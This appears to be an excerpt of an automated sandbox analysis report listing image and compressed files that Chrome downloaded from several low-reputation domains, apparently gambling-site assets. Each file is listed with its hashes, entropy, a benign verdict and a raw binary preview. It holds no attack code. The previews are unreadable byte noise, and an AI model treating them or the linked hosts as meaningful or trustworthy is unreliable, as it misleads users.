                                                                                                                                                          Preview:.PNG........IHDR.............ua.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...w.&Wu.o..'..y.&.F9G.(.@......$...b..wY.k......D..M..r.Q.ir...O.p...Q.t..$.@......LO?OU.:u....9..'.@$......|.Z....!.R..s...[n ......".....[lz......b..0.v../....../.?..?e{.1.P.....+.=.BD.Bz.._y....k../.?..?e.."..`..eP..Y..k6...+i....m_...._.9eC.(...8.O....#.#.......F..J.....'.X..;.*v.3Q.i!f..g.........!A...Z ,D.......T..l]uwO..>...?...l.I.=....|.<....#..a..B./...6.q/}.%._.{....$8.SD..s....i.{....._Jt.V.D.|..........n. .C2......P.Ao........~.j..H<...5..b.!I......"....L.[..P.H...I......'.[?a.....v.9.q1..w.7w......}..._.....a.. ..O)...;........G.N.._tcLf.r .8..?+.....5..>|...m.S..gX.9K....~&.fG*......#....c...^.....kfB..o.!.Xr.......iH..^.D...w-..^.{..^..d..g....Ty.....>..G ....~.X..OQ...v..I......X..y.-.o.a0.....j.(...W. .s..48.~.........B....Z.@.......c./...T?.U....*...)5.T..........2..AW.^E {.TA..+..,....K.x..+I.$....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2647
                                                                                                                                                          Entropy (8bit):7.651439905008171
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VLCNn2OlMS6J3I54X1qGwZVA9FpIxC84W1GZlSETm/tc2FCWp0cEap61NfuzM:g2UMSn54FqLA9G1GZ0ymbNp0cEqcZiM
                                                                                                                                                          MD5:6AACE756945D9822BB232862BFA9DD2A
                                                                                                                                                          SHA1:C17DDFEB7F07CE8D505B1B91912858605BFECC2B
                                                                                                                                                          SHA-256:145785DDB4FB759895CE6E23ECDF6BF317ED9BD637F076F01BD4870A9D9D82AA
                                                                                                                                                          SHA-512:4877B753716EE79E67E0C09B78A3FECBC49AF125D8FCDE0A73F35DA181D0A3625D47048D2DE8D6941AD3AA059BCADBA4C37B380D9A937F7F1AF82C48A7975D02
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_lg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.0-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmpMM:InstanceID="xmp.iid:A5199274064511EC9C03A0A58B27D196" xmpMM:DocumentID="xmp.did:A5199275064511EC9C03A0A58B27D196"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A5199272064511EC9C03A0A58B27D196" stRef:documentID="xmp.did:A5199273064511EC9C03A0A58B27D196"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...$....IDATx..V[h\..].f.j..<c=<.l+q]).*.G5-...Ph.....*!.R7.i..@(-.*%..%}.R...4..Mb....e.%.3.fF3..~..{&.-....g
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):861
                                                                                                                                                          Entropy (8bit):7.444143432519227
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:ZmOcHCWLDjbDtvITX/WQzS3SdO2Yp6ym1aUF:ZNciWLDXBgT+GFv1/F
                                                                                                                                                          MD5:5F5E3165B0B53F0D0178325190698A9B
                                                                                                                                                          SHA1:AFFAB60AB3FE69A4B0A9F71370559A664FE51188
                                                                                                                                                          SHA-256:9577514C1A71CC2E4E0D5A1F4B045D960A7749339C696342F18B5660D0C844FE
                                                                                                                                                          SHA-512:82AA4DAE3279EF328099827CE1CF8957A21192E365DDB28D10181FD3C0879396F0FA481E515A0C9FF9819BEB30A9B4CFF61B4FBE5AA4960ACB4B745F1401CC7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/game_iloveu.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE..........)...9_..^..A..;..fL'..K0..<+.................].....j.C..8.%.61..}.2/.%.f..I.^...J..a..&.....:.B?..-..M.?.q..6..2.....c..i.~%..+.x...3c6...o|\&..j.b..QX&..o...L.Y'q`.Q#.E.. ...d,1...Y/A...tH..:.C1`7,\:.C".....4<).*_8)gR<.....FJ....4...#..A.4......Y...j.A..8'...E...........N.d"..x.......|S..8...................................}..t.p..o.}g..f..e..e..b.a..`..[.7X..V.uP..O..O.M.H..;..;..8..8..4../....q...,.#*..'.p$...9.....<.....]..............btRNS........vg_N9-...........................................................~}yxupm^\[WSOMKKIF@:8'._.t.....IDAT(.c.......b.j...V.an..2.dy.....t.]Uc.u@.&.!qI...Y..-.I6Fu5U.E.5.l+.@.~.<Ly.^...Sg.'.......3.&..h..9...J....'......,m.R.b`...`.Kw.0.h).gL.`..nc..60g4..>E.$m......$....,.`..5Q./=..$..& ..a...$...20s..30...3.....G~1.X.U.....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17920
                                                                                                                                                          Entropy (8bit):7.954260425598395
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:6Xhq0luXIA7ppy5ZlQfVOgMGRWjji7v2FDzBKV9NVZuYGVhrfracy6HZyyaVnUgG:6E0WppU5ZlQfVbIa7v2DW6VrfrkyMn1G
                                                                                                                                                          MD5:9BEEFE094C5746596EB886A0F9CE9516
                                                                                                                                                          SHA1:043A5F197A8B4A8CC3B40A3126F1BFB8CBD12ADA
                                                                                                                                                          SHA-256:39A8BDC4F2DB24410A4A0D4180FF953D1AEC6EFDD7DBAC23A37D08C813214151
                                                                                                                                                          SHA-512:1F41A044818844CD6E734291116E0CAE1E5D93A7659823084103CC3ED3D862EDA115E2B44BA8F5809D0CDE91C9BB7EDCAD75403B196A1D5738105CACD2C6A831
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/lebo_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:E2893C229C1511E79144CCF7D3AEA9BF" xmpMM:InstanceID="xmp.iid:E2893C219C1511E79144CCF7D3AEA9BF" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1fa39400-0423-3b49-88e9-b820ab33a34b" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 11602
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3788
                                                                                                                                                          Entropy (8bit):7.9461485465006305
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:xvLmU+AZJA6gqZH3R7HAOUrBAOS6C1PD8jfAkfsmMv:AZh6/ZHBpKFS6ebe1a
                                                                                                                                                          MD5:D51611D3E17AC5A1DEEC5990BC566D40
                                                                                                                                                          SHA1:A0F11D99C3819D8E564E2E721FC2DFDB697D4E56
                                                                                                                                                          SHA-256:D09021AA2121EA450E9328268D81DBAAC3FC13B510EA6D0272005A4F4C8E2F09
                                                                                                                                                          SHA-512:1064F36ED8D5AC6B06367F9ED0898F498DF489FFBBFAA7EE2C432FC5BDD08A4039FD448573D0BA9F28AC983C2EFDA6F4EC237D937FB9E0A702B0E04BE43D86BC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://2hsuoj.eveday.me/061410/rcenter/common/static/css/gb.validation.min.css
                                                                                                                                                          Preview:...........Z[..Xv~...L......O..1`.\...H#.m...6....H#E....!R.2o."Ey.)J~Mzf./.m.....d8...........|..w...?...........o...y.y....+.@.s.|...^X..........w.....c..cN.P.!Q]....sK`..W.M.+( .........5....\..[.}.4..._...Y=-\X....[.mZ.#......(....5M...2..d_.... ...n.gclo../.....E..Z.9:Yh)k...?Y=..4?[.=.c{z!.6G....O...)....`..G.Kx(.P._rO..Y....8rS.....A..R.c2s...+..A..-.Y].>X{Z.yB.PM>'.z..O.....p..|........Og..........'..A`.6.!......^$."]Y.!..m....%.b.>..#\....sonGof.x@..5{.<..X....&%.#.d.G.T.o...$.p....;..KY...#va..>.....<...,.k_.x....3..=.z.I.h....Eh.*....y..z......1..5..8E=..74.V.B.=....K.O<..t#L`h%.?s.z........=.......O.N....Z8~f......17F..O.kq/]F.7..%...RU...eX.Z...).^.\uluq^~.\.].x..........~Z.6..._7|=.N;.?..Svw....\..S....9..k..=.....S.Gd..^.$.;.)]/&.+O.|J.Y..7...e>....wLFI].B.,...d8...|F.t.k...D...5.y...._L{..+-..Sm...y..b|s!.......o.ir.........y._.e...p.k.P.....R........Y..].......O.....5.......w1.|c....9......I>...v].^......unCTY9A.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1393
                                                                                                                                                          Entropy (8bit):5.850580915886296
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:4s/6Gtam7J1Vk2eJC28PKV29qfIoTZIUvy8+YK://60z12lJC28P5qf1NL+z
                                                                                                                                                          MD5:C2A6EA0A2A9A3B4B9C54322C373C42FB
                                                                                                                                                          SHA1:19BBDB7838AC217367995FB83B6EA104386426A0
                                                                                                                                                          SHA-256:26FADBA4DFF7DBBAAA384818540D4EB2EF2A5C6C90D006A0E47F3C021AC17BE2
                                                                                                                                                          SHA-512:A0AD3E8E8303A8F04F3672BAE41BF1A318AE0625F4821A79ABD64B0170C8649322C73072BA36BE9B31366AF888922E77383FC147020017719956625D5BDCF23D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/sport_evor_w.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....sRGB...,.....pHYs.................PLTE.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................|......tRNS......;n.....uJ.....dH=ATj/W....>.&9.+"3w..P<.Si...x...F.r:4.....^....f2......}Y ......ev..#.'..Q.5.mV....g\O.?.-.D]X..M..(.......)..h.%..|U..1.q@l....o.[L7./8...^IDATx.c`..`dbbf...............D.WPHXDTL\\BR.WT..Y.EFVN^A.n...4..,..*..j.....LZ.:b.z...piCey&&#c..c#S3s9.K+k9.[;.....5.-..]\L\M....5.<<... ..>J.~.......z.A.N......!..`iq{S..p..O.H.......8.x5..D.t...i@tTr0KJj`\Z.OzFf...C.'3..f...9...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 50 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4592
                                                                                                                                                          Entropy (8bit):7.858171152982243
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:uYR25AjLna4MK04BGrfs7hG9nYuLyHQOCxbM9Qml4lc:/FXa4MKvkrghG9Yk8Ct0Wc
                                                                                                                                                          MD5:51FDF17068E84A28557E6E3A2B5E2DBB
                                                                                                                                                          SHA1:13E1E46E5C4A197AA3E0D28E60291D94519B8388
                                                                                                                                                          SHA-256:0FEE5018735220F2F1E5FE7871304A114DE261E21802F50B6598F63081822805
                                                                                                                                                          SHA-512:3AF1BB9FE30F98D0F69C897075A1D3F4E8ABB2ACF66A858D8B147E56E5F98AFD79B06A5D3F61199784CB9A704FEDB3D353AFD99952978BF6E15F314127FF0B14
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/live_allbet.png
                                                                                                                                                          Preview:.PNG........IHDR...2...$......i7....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:E2B0A30B4EB611E9B6AF98114C107AF1" xmpMM:DocumentID="xmp.did:E2B0A30C4EB611E9B6AF98114C107AF1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E2B0A3094EB611E9B6AF98114C107AF1" stRef:documentID="xmp.did:E2B0A30A4EB611E9B6AF98114C107AF1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......`IDATx..XytS..=.i.%K.e.W.6....c0..`6......H&.!L.0..dJI...4i.Rj.4..Y..3.,....[..ly.%k..'i..?fJs.s.?..{.;..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19634
                                                                                                                                                          Entropy (8bit):7.963184945669312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:GQmYc2gqyEc+Ya0YgdNnx6g5LVW7DZ6/VUlOz0ouU0If1H9MwVlJyFR3ZqmeFliO:GQmYYqdc175dVx6gU7oZ7df1H9M5dFe3
                                                                                                                                                          MD5:1D8F3EE8FF9C810124A834D133E23195
                                                                                                                                                          SHA1:FC6D0D17A984C58E60CB1E7490FD8C730A972197
                                                                                                                                                          SHA-256:620E1BDF3C26704F4070CEED466065CFE6AE105D64F8EA11F1E619F1980E8BC6
                                                                                                                                                          SHA-512:CB8C7FBBF43568AD0FFC76B7CBB831CAFEED921B7DC3ED80960C7524B5DFA504F50E51588602EB84A4BBBABBD0A4ABFCA9608CB7374F929E400161B6BFBC8837
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/dg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9878D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9868D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3297
                                                                                                                                                          Entropy (8bit):7.88634311729404
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:6SNad9Q/fgac8/tWdw6Wwbb7Zg2VQTPej:6SId9wJWd/zRDVQTPej
                                                                                                                                                          MD5:851F693260F0B9A02D8EE0FD3E801506
                                                                                                                                                          SHA1:EB54D8B31AB06403910125935DFD53F788D75014
                                                                                                                                                          SHA-256:554C341104B31F70691601A206815D2B34B0B1535CFFCE575E70F4E2A62532E1
                                                                                                                                                          SHA-512:5BB7C2AAC743357FFF74D7D5AE82E7A144C063AA640A4BB32994B98AE8CA0F29A7EE4AE01C72DAEC49A70525E9BA9DEE85EDDEBEE377EFE82C76A046A56F7A1D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/game_vdd.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....pHYs.................IDATh..Z}pTU...........&...&. aK..DP..U...T...a....S.8U*.e....B.S...[c.Z..%...B.J&&F.&..t........v'..u.!._.........{..2.R.1......#<.1Gx.c..l..........._g2..UUU..7n........y.....(..E..T..............<.A.....>.kUU.Y...4......3...y>U[[...O?....>...>.,.^.x.i.{GGG].$..i..V_t]gEQ.jjj>{...\.x.........g&<<<.g.X...s?".,.c.&..>x..SQ..w.}w..~.....0......_.}O:...n...w.px5....7.,((.=.......dr...0DQ...L.L..!..Ph....m.-{....#.....R]]}j......@.m..N).(.0M..i....[.n../...p.....;.^/.$........b.O....n...RZ.......T.....v.4....&..j.....}}}y}.0..(.(,,.a..w....W.X.F8...H...(**..~.......@..d2.0.C.!T.E...Q........0`...$!......../^.k.m.l6[..y]....s;...z..UU...Y.....X]]}....wV.<.B.0.p8...q...o...X,....v...?........drf..,.(..E.6.5M.$I....l...8p.@..u.v8..x.IB...@:..i.yDUU.(.p8.Y}...?...-y..f&l.....y.B!o..?.L&.J)..4(..e.|..>...]....J..`....+?....i......iZqgg...AI.E..n..A....G.N.B...d2....k.}.4.a..d...q..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/guide.jpg
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2026
                                                                                                                                                          Entropy (8bit):6.550833124518682
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6NVd6V4knA9WIb102t0/3LwXj3E3HSy30ZYHlxtvjyznpqWRN:wSJlknmWIbD63sg3HSoHlPvunH
                                                                                                                                                          MD5:5E50D4E76B0014CC5521DAE3EEE4CDB8
                                                                                                                                                          SHA1:8EBE887A860F0CC896078FE1AC5CCBFC1057A529
                                                                                                                                                          SHA-256:3DC953ADC1D90DE566B011CCE2A3DE7B1EFBFD5F9F93E82C3CEDEF0E5C91F6DD
                                                                                                                                                          SHA-512:058176ADFF4BE9FD7BD05825546BC0C43B3F322D343288165D912365AC3F3C10E347AA6EF682F46C5C3B7E951CD336BE7168F008E5147E78A168C4B89A39A8C4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be9, 2021/12/08-19:11:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.2 (Windows)" xmp:CreateDate="2022-08-12T11:41:49+08:00" xmp:ModifyDate="2022-08-12T11:47:34+08:00" xmp:MetadataDate="2022-08-12T11:47:34+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9c358eab-39e0-a54c-99ae-0692b5390b5a" xmpMM:DocumentID="adobe:docid:photoshop:b387ea0c-2c61-f045-9e1c-ef5c35f3f642" xmpMM:OriginalDocumentID="xmp.did:0ac9fd
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x144, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2606
                                                                                                                                                          Entropy (8bit):3.7483638467146463
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:UyYHu0qHk7yI5/4NZBxY3uaYbh09pbUEdFH2LxrnWXm:UyYVqcyS/EZBC3ulh0HbtH2Lxrnim
                                                                                                                                                          MD5:90D3C2727BCF19B525AD48DB9E551895
                                                                                                                                                          SHA1:52F583E4A3EAD51B606F69FE7039CBA84DAAFC64
                                                                                                                                                          SHA-256:EF6394DA4FA97DE9A1D6BC3DD3FAB9577A8153614F42C3A86F89BAE635EE40B3
                                                                                                                                                          SHA-512:9B02C0F5A7FE1AB4A4276911C6352C57AFD2B5AD29DEF928BFF0FBE910D4AE64A6F174EB505F87BCF1E1ED13CCE0010A52422BA5D6DC12AF3DF638668A53A2D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/index/383/menu/menubg.jpg
                                                                                                                                                          Preview:......JFIF.............C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................P..P. ........ .. .........@.............................................H.................(....()J".,U.)AV.Q..@B .!....P........................................................R..............*...P.(.TPR..ZQ..AATP......H*..(B........................................................ ...........................V.E.Q@............T@ ............................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/cc.png?r=2654442886
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
